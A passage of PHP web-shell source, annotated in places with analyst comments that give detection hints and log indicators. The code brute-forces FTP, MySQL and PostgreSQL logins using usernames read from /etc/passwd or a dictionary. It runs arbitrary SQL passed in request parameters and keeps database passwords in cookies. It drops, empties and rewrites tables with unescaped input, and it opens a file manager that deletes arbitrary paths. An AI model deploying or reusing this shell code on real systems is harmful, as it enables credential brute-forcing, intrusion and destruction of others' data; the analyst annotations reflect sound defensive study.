// Analyst note: single-credential FTP login probe, defined when prototype == 'ftp'.
// Opens a new FTP connection to $ip, tries $login/$pass once, closes the
// connection and returns the ftp_login() result (false when the connection fails).
// Every call is prefixed with @, so PHP warnings from refused connections or
// rejected logins are suppressed on the host running the script.
// Detection: the loops later in this branch call this once per candidate, so the
// targeted FTP service should show a run of short sessions with failed logins,
// presumably originating from the web server's own address.
3963 function BruteFun($ip,$port,$login,$pass)
3964 {
3965 $fp = @ftp_connect($ip, $port?$port:21); // port 21 is used when $port is empty
3966 if(!$fp) return false; // an unreachable server is reported the same way as a rejected login
3967 $res = @ftp_login($fp, $login, $pass);
3968 @ftp_close($fp); // one connection per attempt; nothing is reused
3969 return $res;
3970 }
3971 }
3972 elseif( $_GET['prototype'] == 'mysql' )
3973 {
// Analyst note: single-credential MySQL login probe, defined when prototype == 'mysql'.
// Calls the legacy mysql_connect() API with $login/$pass and returns its result;
// 3306 appears in the server argument as a fallback port.
// The mysql_* extension was removed in PHP 7.0, so this branch can only run on
// older interpreters (or behind a compatibility shim), which helps when scoping impact.
// Detection: where connection logging is enabled, failed attempts should surface
// as access-denied entries in the MySQL server log.
3974 function BruteFun($ip,$port,$login,$pass)
3975 {
3976 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
3977 @mysql_close($res); // closed immediately; @ hides the warning when the connect failed
3978 return $res;
3979 }
3980 }
3981 elseif( $_GET['prototype'] == 'pgsql' )
3982 {
// Analyst note: single-credential PostgreSQL login probe, defined when prototype == 'pgsql'.
// Builds a connection string from the arguments, always naming the "postgres"
// database, calls pg_connect(), closes the handle and returns the pg_connect() result.
// Errors are suppressed with @, so nothing appears in PHP's own output on failure.
// Detection: repeated authentication failures for database "postgres" in the
// PostgreSQL server log are the expected trace of this routine.
3983 function BruteFun($ip,$port,$login,$pass)
3984 {
3985 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
3986 $res = @pg_connect($str);
3987 @pg_close($res); // closed immediately; one connection per attempt
3988 return $res;
3989 }
3990 }
3991
3992 $success = 0;
3993 $attempts = 0;
3994 $server = explode(":", $_GET['server']);
3995 if($_GET['type'] == 1)
3996 {
3997 $temp = @file('/etc/passwd');
3998 if( is_array($temp))
3999 foreach($temp as $line)
4000 {
4001 $line = explode(":", $line);
4002 ++$attempts;
4003 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
4004 {
4005 $success++;
4006 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
4007 }
4008 if(@$_GET['reverse'])
4009 {
4010 $tmp = "";
4011 for($i=strlen($line[0])-1; $i>=0; --$i)
4012 $tmp .= $line[0][$i];
4013 ++$attempts;
4014 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
4015 {
4016 $success++;
4017 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
4018 }
4019 }
4020 }
4021 }
4022 elseif($_GET['type'] == 2)
4023 {
4024 $temp = @file($_GET['dict']);
4025 if( is_array($temp) )
4026 foreach($temp as $line)
4027 {
4028 $line = trim($line);
4029 ++$attempts;
4030 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
4031 {
4032 $success++;
4033 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
4034 }
4035 }
4036 }
4037 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
4038}
4039// Execute Query
4040else if(isset($_GET["executeit"]))
4041{
4042 if(isset($_GET['username']) && isset($_GET['server']))
4043 {
4044 $dbserver = $_GET['server'];
4045 $dbuser = $_GET['username'];
4046 $dbpass = $_GET['password'];
4047 if(mysql_connect($dbserver,$dbuser,$dbpass))
4048 {
4049 setcookie("dbserver", $dbserver);
4050 setcookie("dbuser", $dbuser);
4051 setcookie("dbpass", $dbpass);
4052
4053 listdatabase();
4054 }
4055 else
4056 echo "cannotconnect";
4057 }
4058}
4059else if(isset($_GET['action']) && isset($_GET['dbname']))
4060
4061
4062 {
4063 if($_GET['action'] == "createDB")
4064 {
4065 $dbname = $_GET['dbname'];
4066 $dbserver = $_COOKIE["dbserver"];
4067 $dbuser = $_COOKIE["dbuser"];
4068 $dbpass = $_COOKIE["dbpass"];
4069 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4070 mysql_query("create database $dbname",$mysqlHandle);
4071 listdatabase();
4072 }
4073 if($_GET['action'] == 'dropDB')
4074 {
4075 $dbname = $_GET['dbname'];
4076 $dbserver = $_COOKIE["dbserver"];
4077 $dbuser = $_COOKIE["dbuser"];
4078 $dbpass = $_COOKIE["dbpass"];
4079 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4080 mysql_query("drop database $dbname",$mysqlHandle);
4081 mysql_close($mysqlHandle);
4082 listdatabase();
4083 }
4084
4085 if($_GET['action'] == 'listTables')
4086 {
4087 listtable();
4088 }
4089
4090 // Create Tables
4091 if($_GET['action'] == "createtable")
4092 {
4093 $dbserver = $_COOKIE["dbserver"];
4094 $dbuser = $_COOKIE["dbuser"];
4095 $dbpass = $_COOKIE["dbpass"];
4096 $dbname = $_GET['dbname'];
4097 $tablename = $_GET['tablename'];
4098 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4099 mysql_select_db($dbname);
4100 mysql_query("CREATE TABLE $tablename ( no INT )");
4101 listtable();
4102 }
4103
4104 // Drop Tables
4105 if($_GET['action'] == "dropTable")
4106 {
4107 $dbserver = $_COOKIE["dbserver"];
4108 $dbuser = $_COOKIE["dbuser"];
4109 $dbpass = $_COOKIE["dbpass"];
4110 $dbname = $_GET['dbname'];
4111 $tablename = $_GET['tablename'];
4112 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4113 mysql_select_db($dbname);
4114 mysql_query("drop table $tablename");
4115 listtable();
4116 }
4117
4118 // Empty Tables
4119 if($_GET['action'] == "empty")
4120 {
4121 $dbserver = $_COOKIE["dbserver"];
4122 $dbuser = $_COOKIE["dbuser"];
4123 $dbpass = $_COOKIE["dbpass"];
4124 $dbname = $_GET['dbname'];
4125 $tablename = $_GET['tablename'];
4126 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4127 mysql_select_db($dbname);
4128 mysql_query("delete from $tablename");
4129 listtable();
4130 }
4131
4132 // Empty Tables
4133 if($_GET['action'] == "dropField")
4134 {
4135 $dbserver = $_COOKIE["dbserver"];
4136 $dbuser = $_COOKIE["dbuser"];
4137 $dbpass = $_COOKIE["dbpass"];
4138 $dbname = $_GET['dbname'];
4139 $tablename = $_GET['tablename'];
4140 $fieldname = $_GET['fieldname'];
4141 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4142 mysql_select_db($dbname);
4143 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
4144 mysql_select_db( $dbname, $mysqlHandle );
4145 mysql_query( $queryStr , $mysqlHandle );
4146 listtable();
4147 }
4148
4149 if($_GET['action'] == 'viewdb')
4150 {
4151 listdatabase();
4152 }
4153
4154 // View Table Schema
4155 if($_GET['action'] == "viewSchema")
4156 {
4157 $dbserver = $_COOKIE["dbserver"];
4158 $dbuser = $_COOKIE["dbuser"];
4159 $dbpass = $_COOKIE["dbpass"];
4160 $dbname = $_GET['dbname'];
4161 $tablename = $_GET['tablename'];
4162 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4163 mysql_select_db($dbname);
4164 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4165 $pResult = mysql_query( "SHOW fields FROM $tablename" );
4166 $num = mysql_num_rows( $pResult );
4167 echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
4168 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
4169 for( $i = 0; $i < $num; $i++ )
4170 {
4171 $field = mysql_fetch_array( $pResult );
4172 echo "<tr>\n";
4173 echo "<td>".$field["Field"]."</td>\n";
4174 echo "<td>".$field["Type"]."</td>\n";
4175 echo "<td>".$field["Null"]."</td>\n";
4176 echo "<td>".$field["Key"]."</td>\n";
4177 echo "<td>".$field["Default"]."</td>\n";
4178 echo "<td>".$field["Extra"]."</td>\n";
4179 $fieldname = $field["Field"];
4180 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
4181 echo "</tr>\n";
4182 }
4183 echo "</table>";
4184 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4185 }
4186
4187 // Execute Query
4188 if($_GET['action'] == "executequery")
4189 {
4190 $dbserver = $_COOKIE["dbserver"];
4191 $dbuser = $_COOKIE["dbuser"];
4192 $dbpass = $_COOKIE["dbpass"];
4193 $dbname = $_GET['dbname'];
4194 $tablename = $_GET['tablename'];
4195 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4196 mysql_select_db($dbname);
4197 $result = mysql_query($_GET['executemyquery']);
4198
4199 // results
4200 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
4201
4202 $count = 0;
4203 while ($row = mysql_fetch_assoc($result))
4204 {
4205 echo "<tr>\r\n";
4206
4207 if ($count==0) // list column names
4208 {
4209 echo "<tr>\r\n";
4210 while($key = key($row))
4211 {
4212 echo "<td><b>" . $key . "</b></td>\r\n";
4213 next($row);
4214 }
4215 echo "</tr>\r\n";
4216 }
4217
4218 foreach($row as $r) // list content of column names
4219 {
4220 if ($r=='') $r = '<font >NULL</font>';
4221 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
4222 }
4223 echo "</tr>\r\n";
4224 $count++;
4225 }
4226 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
4227 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4228 }
4229
4230 // View Table Data
4231 if($_GET['action'] == "viewdata")
4232 {
4233 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4234 $dbserver = $_COOKIE["dbserver"];
4235 $dbuser = $_COOKIE["dbuser"];
4236 $dbpass = $_COOKIE["dbpass"];
4237 $dbname = $_GET['dbname'];
4238 $tablename = $_GET['tablename'];
4239 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4240 ?>
4241 <br><br>
4242 <form>
4243 <table>
4244 <tr>
4245 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
4246 </tr>
4247 <tr>
4248 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
4249 </tr>
4250 </table>
4251 </form>
4252 <?php
4253 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4254 mysql_select_db($dbname);
4255
4256 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4257 $row = mysql_fetch_array($sql);
4258 $rowid = $row['COLUMN_NAME'];
4259
4260 echo "<br><font size=4 color =lime>Data in Table</font><br>";
4261 if( $tablename != "" )
4262 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
4263 else
4264 echo "<font size=3 class=txt>$dbname</font><br>";
4265
4266 $queryStr = "";
4267 $pag = 0;
4268 $queryStr = stripslashes( $queryStr );
4269 if( $queryStr == "" )
4270 {
4271 if(isset($_REQUEST['page']))
4272 {
4273 $res = mysql_query("select * from $tablename");
4274 $getres = mysql_num_rows($res);
4275 $coun = ceil($getres/30);
4276 if($_REQUEST['page'] != 1)
4277
4278 $pag = $_REQUEST['page'] * 30;
4279 else
4280 $pag = $_REQUEST['page'] * 30;
4281
4282 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
4283 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
4284 $arrcount = 1;
4285 $arrdata[$arrcount] = 0;
4286 while($row = mysql_fetch_array($sql))
4287 {
4288 $arrdata[$arrcount] = $row[$rowid];
4289 $arrcount++;
4290 }
4291 }
4292 else
4293 {
4294 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
4295 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
4296 $arrcount = 1;
4297 $arrdata[$arrcount] = 0;
4298 while($row = mysql_fetch_array($sql))
4299 {
4300 $arrdata[$arrcount] = $row[$rowid];
4301 $arrcount++;
4302 }
4303 }
4304 if( $orderby != "" )
4305 $queryStr .= " ORDER BY $orderby";
4306 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
4307 }
4308
4309
4310 $pResult = mysql_query($queryStr );
4311 $fieldt = mysql_fetch_field($pResult);
4312 $tablename = $fieldt->table;
4313 $errMsg = mysql_error();
4314
4315 $GLOBALS[queryStr] = $queryStr;
4316
4317 if( $pResult == false )
4318 {
4319 echoQueryResult();
4320 return;
4321 }
4322 if( $pResult == 1 )
4323 {
4324 $errMsg = "Success";
4325 echoQueryResult();
4326 return;
4327 }
4328
4329 echo "<hr color='#1B1B1B'>\n";
4330
4331 $row = mysql_num_rows( $pResult );
4332 $col = mysql_num_fields( $pResult );
4333
4334 if( $row == 0 )
4335 {
4336 echo "<font size=3>No Data Exist!</font>";
4337 return;
4338 }
4339
4340 if( $rowperpage == "" ) $rowperpage = 30;
4341 if( $page == "" ) $page = 0;
4342 else $page--;
4343 mysql_data_seek( $pResult, $page * $rowperpage );
4344
4345 echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
4346 echo "<tr>\n";
4347 for( $i = 0; $i < $col; $i++ )
4348 {
4349 $field = mysql_fetch_field( $pResult, $i );
4350 echo "<th>";
4351 if($action == "viewdata")
4352 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
4353 else
4354 echo $field->name."\n";
4355 echo "</th>\n";
4356 }
4357 echo "<th colspan=2>Action</th>\n";
4358 echo "</tr>\n";
4359 $num=1;
4360
4361
4362 $acount = 1;
4363
4364 for( $i = 0; $i < $rowperpage; $i++ )
4365 {
4366 $rowArray = mysql_fetch_row( $pResult );
4367 if( $rowArray == false ) break;
4368 echo "<tr>\n";
4369 $key = "";
4370 for( $j = 0; $j < $col; $j++ )
4371 {
4372 $data = $rowArray[$j];
4373
4374 $field = mysql_fetch_field( $pResult, $j );
4375 if( $field->primary_key == 1 )
4376 $key .= "&" . $field->name . "=" . $data;
4377
4378 if( strlen( $data ) > 30 )
4379 $data = substr( $data, 0, 30 ) . "...";
4380 $data = htmlspecialchars( $data );
4381 echo "<td>\n";
4382 echo "<font class=txt>$data</font>\n";
4383 echo "</td>\n";
4384 }
4385
4386 if(!is_numeric($arrdata[$acount]))
4387 echo "<td colspan=2>No Key</td>\n";
4388 else
4389 {
4390 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
4391 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
4392 $acount++;
4393 }
4394 }
4395 echo "</tr>\n";
4396
4397
4398 echo "</table>";
4399 if($arrcount > 30)
4400 {
4401 $res = mysql_query("select * from $tablename");
4402 $getres = mysql_num_rows($res);
4403 $coun = ceil($getres/30);
4404 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
4405 for($i=0;$i<$coun;$i++)
4406 echo "<option value=$i>$i</option>";
4407
4408 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
4409 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4410 }
4411 }
4412
4413 // Delete Table Data
     // Analyst note: request handler for action=deleteData. Database host, user
     // and password are taken from the dbserver/dbuser/dbpass cookies, so the
     // credentials travel in the Cookie header of every request to this script.
     // The mysql_* extension used here was removed in PHP 7.0, so this path can
     // only run on older interpreters, which helps when scoping affected hosts.
     // Log indicator: query strings carrying action=deleteData with dbname and
     // tablename.
4414 if($_GET['action'] == "deleteData")
4415 {
4416 $dbserver = $_COOKIE["dbserver"];
4417 $dbuser = $_COOKIE["dbuser"];
4418 $dbpass = $_COOKIE["dbpass"];
4419 $dbname = $_GET['dbname'];
4420 $tablename = $_GET['tablename'];
4421 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4422 mysql_select_db($dbname);
     // Primary-key column lookup; dbname and tablename are interpolated into
     // the SQL text exactly as received.
4423 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4424 $row = mysql_fetch_array($sql);
4425 $row = $row['COLUMN_NAME'];
     // The row to delete is picked by the GET parameter whose name equals the
     // primary-key column name.
4426 $rowid = $_GET[$row];
4427 mysql_query("delete from $tablename where $row = '$rowid'");
     // listtable() is defined outside this part of the file.
4428 listtable();
4429 }
4430 // Edit Table Data
4431 if($_GET['action'] == "editData")
4432 {
4433 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4434 $dbserver = $_COOKIE["dbserver"];
4435 $dbuser = $_COOKIE["dbuser"];
4436 $dbpass = $_COOKIE["dbpass"];
4437 $dbname = $_GET['dbname'];
4438 $tablename = $_GET['tablename'];
4439 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4440 ?>
4441 <br><br>
4442 <form action="<?php echo $self; ?>" method="post">
4443 <?php
4444 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4445 mysql_select_db($dbname);
4446
4447 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4448 $row = mysql_fetch_array($sql);
4449 $row = $row['COLUMN_NAME'];
4450 $rowid = $_GET[$row];
4451
4452 $pResult = mysql_list_fields( $dbname, $tablename );
4453 $num = mysql_num_fields( $pResult );
4454
4455 $key = "";
4456 for( $i = 0; $i < $num; $i++ )
4457 {
4458 $field = mysql_fetch_field( $pResult, $i );
4459 if( $field->primary_key == 1 )
4460 if( $field->numeric == 1 )
4461 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
4462 else
4463 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
4464 }
4465 $key = substr( $key, 0, strlen($key)-4 );
4466
4467 mysql_select_db( $dbname, $mysqlHandle );
4468 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
4469 $data = mysql_fetch_array( $pResult );
4470
4471 echo "<table cellspacing=1 cellpadding=2 border=1>\n";
4472 echo "<tr>\n";
4473 echo "<th>Name</th>\n";
4474 echo "<th>Type</th>\n";
4475 echo "<th>Function</th>\n";
4476 echo "<th>Data</th>\n";
4477 echo "</tr>\n";
4478
4479 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4480 $num = mysql_num_rows( $pResult );
4481
4482 $pResultLen = mysql_list_fields( $dbname, $tablename );
4483 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
4484 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
4485 for( $i = 0; $i < $num; $i++ )
4486 {
4487 $field = mysql_fetch_array( $pResult );
4488 $fieldname = $field["Field"];
4489 $fieldtype = $field["Type"];
4490 $len = mysql_field_len( $pResultLen, $i );
4491
4492 echo "<tr>";
4493 echo "<td>$fieldname</td>";
4494 echo "<td>".$field["Type"]."</td>";
4495 echo "<td>\n";
4496 echo "<select name=${fieldname}_function class=sbox>\n";
4497 echo "<option>\n";
4498 echo "<option>ASCII\n";
4499 echo "<option>CHAR\n";
4500 echo "<option>SOUNDEX\n";
4501 echo "<option>CURDATE\n";
4502 echo "<option>CURTIME\n";
4503 echo "<option>FROM_DAYS\n";
4504 echo "<option>FROM_UNIXTIME\n";
4505 echo "<option>NOW\n";
4506 echo "<option>PASSWORD\n";
4507 echo "<option>PERIOD_ADD\n";
4508 echo "<option>PERIOD_DIFF\n";
4509 echo "<option>TO_DAYS\n";
4510 echo "<option>USER\n";
4511 echo "<option>WEEKDAY\n";
4512 echo "<option>RAND\n";
4513 echo "</select>\n";
4514 echo "</td>\n";
4515 $value = htmlspecialchars($data[$i]);
4516 $type = strtok( $fieldtype, " (,)\n" );
4517 if( $type == "enum" || $type == "set" )
4518 {
4519 echo "<td>\n";
4520 if( $type == "enum" )
4521 echo "<select name=$fieldname class=box>\n";
4522 else if( $type == "set" )
4523 echo "<select name=$fieldname size=4 class=box multiple>\n";
4524 while( $str = strtok( "'" ) )
4525 {
4526 if( $value == $str )
4527 echo "<option selected>$str\n";
4528 else
4529 echo "<option>$str\n";
4530 strtok( "'" );
4531 }
4532 echo "</select>\n";
4533 echo "</td>\n";
4534 }
4535 else
4536 {
4537 if( $len < 40 )
4538 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
4539 else
4540 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
4541 }
4542 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4543 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4544 echo "</tr>";
4545 }
4546 $fundata1=eregi_replace(',$', '', $fundata1);
4547 $fundata2=eregi_replace(',$', '', $fundata2);
4548
4549 echo "</table><p>\n";
4550 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
4551 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
4552 echo "</form>\n";
4553 }
4554 }
4555// Edit Submit Table Data
// Analyst note: handler for action=editsubmitData. It rewrites one row of an
// arbitrary table using the DB credentials held in the dbserver/dbuser/dbpass
// cookies. dbname, tablename and the key value come from the POST body, the
// column values from $_REQUEST. Nothing is escaped before it is placed in the
// SQL text. Log indicator: POST bodies containing action=editsubmitData.
4556else if($_REQUEST['action'] == "editsubmitData")
4557{
4558 $dbserver = $_COOKIE["dbserver"];
4559 $dbuser = $_COOKIE["dbuser"];
4560 $dbpass = $_COOKIE["dbpass"];
4561 $dbname = $_POST['dbname'];
4562 $tablename = $_POST['tablename'];
4563
4564 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4565 mysql_select_db($dbname);
4566
     // Primary-key column of the target table, then the POST field of that name.
4567 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4568 $row = mysql_fetch_array($sql);
4569 $row = $row['COLUMN_NAME'];
4570 $rowid = $_POST[$row];
4571
4572 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4573 $num = mysql_num_rows( $pResult );
4574
4575 $rowcount = $num;
4576
     // $pResultLen is assigned but not read again in this branch.
4577 $pResultLen = mysql_list_fields( $dbname, $tablename );
4578
     // One "column = 'value'" pair per column reported by SHOW fields; $str is
     // appended to without being initialised in this branch.
4579 for( $i = 0; $i < $num; $i++ )
4580 {
4581 $field = mysql_fetch_array( $pResult );
4582 $fieldname = $field["Field"];
4583 $arrdata = $_REQUEST[$fieldname];
4584
4585 $str .= " " . $fieldname . " = '" . $arrdata . "'";
4586 $rowcount--;
4587 if($rowcount != 0)
4588 $str .= ",";
4589 }
4590
     // The key value is appended unquoted in the WHERE clause.
4591 $str = "update $tablename set" . $str . " where $row=$rowid";
4592 mysql_query($str);
4593 ?><div id="showsql"></div><?php
4594}
4595// Insert Table Data
// Analyst note: handler for action=insertdata. It inserts a row into an
// arbitrary table using the DB credentials from the dbserver/dbuser/dbpass
// cookies. Column values are read from $_REQUEST by column name and placed in
// the SQL text unescaped. eregi_replace() and the mysql_* functions were removed
// in PHP 7.0, so this branch only runs on older interpreters.
// Log indicator: POST bodies containing action=insertdata.
4596else if($_REQUEST['action'] == "insertdata")
4597{
4598 $dbserver = $_COOKIE["dbserver"];
4599 $dbuser = $_COOKIE["dbuser"];
4600 $dbpass = $_COOKIE["dbpass"];
4601 $dbname = $_POST['dbname'];
4602 $tablename = $_POST['tablename'];
4603
4604 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4605 mysql_select_db($dbname);
4606
     // The primary-key lookup is repeated here, but $rowid is not used again in
     // this branch.
4607 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4608 $row = mysql_fetch_array($sql);
4609 $row = $row['COLUMN_NAME'];
4610 $rowid = $_POST[$row];
4611
4612 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4613 $num = mysql_num_rows( $pResult );
4614
4615 $rowcount = $num;
4616
4617 $pResultLen = mysql_list_fields( $dbname, $tablename );
4618
     // $str1 collects the column list and $str2 the quoted values; both are
     // appended to without being initialised in this branch.
4619 for( $i = 0; $i < $num; $i++ )
4620 {
4621 $field = mysql_fetch_array( $pResult );
4622 $fieldname = $field["Field"];
4623 $arrdata = $_REQUEST[$fieldname];
4624
4625 $str1 .= "".$fieldname . ",";
4626 $str2 .= "'".$arrdata . "',";
4627 $rowcount--;
4628 if($rowcount != 0)
4629 {
4630 //$str1 .= $fieldname . ",";
4631 //$str2 .= $arrdata . ",";
4632 }
4633 }
     // Strip the trailing comma from each list.
4634 $str1=eregi_replace(',$', '', $str1);
4635 $str2=eregi_replace(',$', '', $str2);
4636 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
4637 mysql_query($str);
4638
4639 ?><div id="showsql"></div><?php
4640}
4641else if(isset($_GET['logoutdb']))
4642{
     // Analyst note: the second argument of setcookie() is the cookie VALUE, not
     // an expiry time. These calls therefore overwrite dbserver/dbuser/dbpass
     // with a numeric timestamp as session cookies rather than expiring them.
     // A browser that used this "Log Out" link still holds the three cookie
     // names afterwards, which can matter when examining an operator's or a
     // victim admin's browser profile.
     // $self is not assigned inside this branch.
4643 setcookie("dbserver",time() - 60*60);
4644 setcookie("dbuser",time() - 60*60);
4645 setcookie("dbpass",time() - 60*60);
4646 header("Location:$self");
4647}
4648else if(isset($_POST['choice']))
4649{
     // Analyst note: bulk file-manager actions, selected by POST choice =
     // delete | chmod | changefileperms | compre | uncompre. Target paths arrive
     // in POST actbox[] as comma-joined strings and are used as given; no
     // base-directory restriction is visible in this handler.
     // Host artefacts to look for: deleted files and directories, changed
     // permission bits, and new .zip / .tar files in the script's working
     // directory.
4650 if($_POST['choice'] == "delete")
4651 {
4652 $actbox = $_POST["actbox"];
4653
     // The first foreach has no braces, so it only reassigns $myv. The second
     // loop runs over the split of the LAST actbox[] element only. The same
     // pattern is repeated in every sub-action below.
4654 foreach ($actbox as $myv)
4655 $myv = explode(",",$myv);
4656 foreach ($myv as $v)
4657 {
4658 if(is_file($v))
4659 {
4660 if(unlink($v))
4661 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
4662 else
4663 echo "<br><center>Cannot Delete File $v</center>";
4664 }
4665 else if(is_dir($v))
4666 {
     // rrmdir() is defined outside this part of the file.
4667 rrmdir($v);
4668 }
4669 }
4670 }
4671 else if($_POST['choice'] == "chmod")
4672 { ?>
4673 <form id="chform"><?php
